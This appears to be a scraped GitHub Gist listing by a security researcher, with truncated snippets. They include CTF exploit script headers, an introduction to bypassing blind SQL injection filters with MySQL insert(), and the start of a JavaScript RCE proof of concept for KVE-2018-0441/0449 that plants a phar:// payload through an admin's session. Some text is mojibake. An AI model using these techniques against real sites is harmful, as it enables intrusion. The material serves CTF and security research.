Solves: 1
This write-up was made per request of other players who were playing ASIS CTF.
Note: I solved this challenge before the hint was released. \o/
stypr
๐**********************************
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # derived from http://stackoverflow.com/questions/40046916/how-to-grant-permission-to-user-on-certificate-private-key-using-powershell | |
| param ( | |
| [string]$certThumbprint = "NothingToDoHere" | |
| ) | |
| $serviceAccount = 'NETWORK SERVICE' | |
| $permissionType = 'Read' | |
| try | |
| { | |
| Write-Host "Thumbprint: $certThumbprint" | |
| #Clear Existing Variables |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python -u | |
| #-*-coding: utf-8-*- | |
| def list_directory(expression): | |
| try: | |
| _c = __import__("glob").glob(expression + "/*") | |
| for i in xrange(len(_c)): | |
| if "uploads" not in _c[i] and "userimage" not in _c[i] and "files" not in _c[i]: | |
| _c.extend(list_directory(_c[i])) | |
| return _c | |
| except: |
encryption-functions from mysql.com
-
ENCRYPT(x) ์ ํ๋ฅ ์ ๋ฌธ์ ๋ฅผ ํ ์ ์์ง๋ง, salt ๊ฐ์ ์ค์ ํ๋ฉด ์ฒซ๋ฒ์งธ ๋ช ๊ธ์ ์ ๋๋ ๊ฐ๊ฒ ๋๋ฏ๋ก ํ๋ฅ ์ด ๊ต์ฅํ ์ค์ด๋ฌ.
-
ENCRYPT(x,y) ์ถ๋ ฅ์ ๋์ค๋ ๊ฐ์
A-Za-z0-9./๋ก ์ด๋ฃจ์ด์ ธ์์ด์ ํ๋ฅ ์ ์ด๋ ต์ง๋ง, ๋ฌธ์ ์์strtolower($var)๋ก ์ธํด ํ๋ฅ ์ด 2์ฐจ์ ์ผ๋ก ์ค์ด๋ค์.
stypr
/ iptables-irccloud.sh
Created
October 29, 2017 14:42
iptables configuration for connections between irssiproxy and irccloud
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| iptables -N irccloud | |
| iptables -A irccloud --src 192.184.9.108 -j ACCEPT | |
| iptables -A irccloud --src 192.184.9.110 -j ACCEPT | |
| iptables -A irccloud --src 192.184.9.112 -j ACCEPT | |
| iptables -A irccloud --src 192.184.10.118 -j ACCEPT | |
| iptables -A irccloud --src 192.184.10.9 -j ACCEPT | |
| iptables -A irccloud --src 170.178.187.131 -j ACCEPT | |
| iptables -A irccloud --src 192.184.8.73 -j ACCEPT | |
| iptables -A irccloud --src 192.184.8.103 -j ACCEPT | |
| iptables -A irccloud -j DROP |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python -u | |
| #-*- encoding: utf-8 -*- | |
| import os | |
| import sys | |
| import requests | |
| import json | |
| from base64 import * | |
| HOST = "core.eagle-jump.org" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function generator() | |
| { | |
| $PATH = "./s3cre7_fi1e"; | |
| $init_seed = 0; | |
| if(!file_exists(realpath($PATH))) | |
| { | |
| $init_seed = $seed = intval(uniqid(),10); | |
| $f = fopen($PATH,"w"); | |
| fwrite($f,$init_seed); |
There are several ways to bypass blind SQLi filters,
and today I will introduce MySQL blind sqli payload using an insert() function.
Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should be still valid in most SQL.
This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ... ) are blocked by the script.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python -u | |
| #-*- coding: utf-8 -*- | |
| # Developer: Harold Kim([email protected]) | |
| import os | |
| import sys | |
| import re | |
| import requests | |
| class iptime: |
stypr
/ attack_script.js
Last active
August 3, 2019 16:47
KVE-2018-0441, KVE-2018-0449 RCE PoC (Windows Only)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // ์ ๋ก๋ํ ํ์ผ์ ํ์ด๋ก๋. | |
| // var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`; | |
| var payload = `[PAYLOAD_URL]` | |
| // ๋จผ์ ๊ณต๊ฒฉ์ ์์, ํด๋น ๊ธฐ๋ฅ์ ์ง์ํ๋ ๊ด๋ฆฌ์์ธ์ง ํ์ธํ๋ค. | |
| $.get(`../qa_config.php`, function(d){ | |
| // ์์ ํ ๊ณณ์ โํ์ผ ๊ฒฝ๋กโ ๊ฐ ๋ค์ด๊ฐ ๊ณณ์ด๋ฏ๋ก, ์ด ๋ถ๋ถ๋ง ์ฐ์ ํ์ธํ๋ค. | |
| if(d.indexOf(`์๋จ ํ์ผ ๊ฒฝ๋ก`) !== false){ |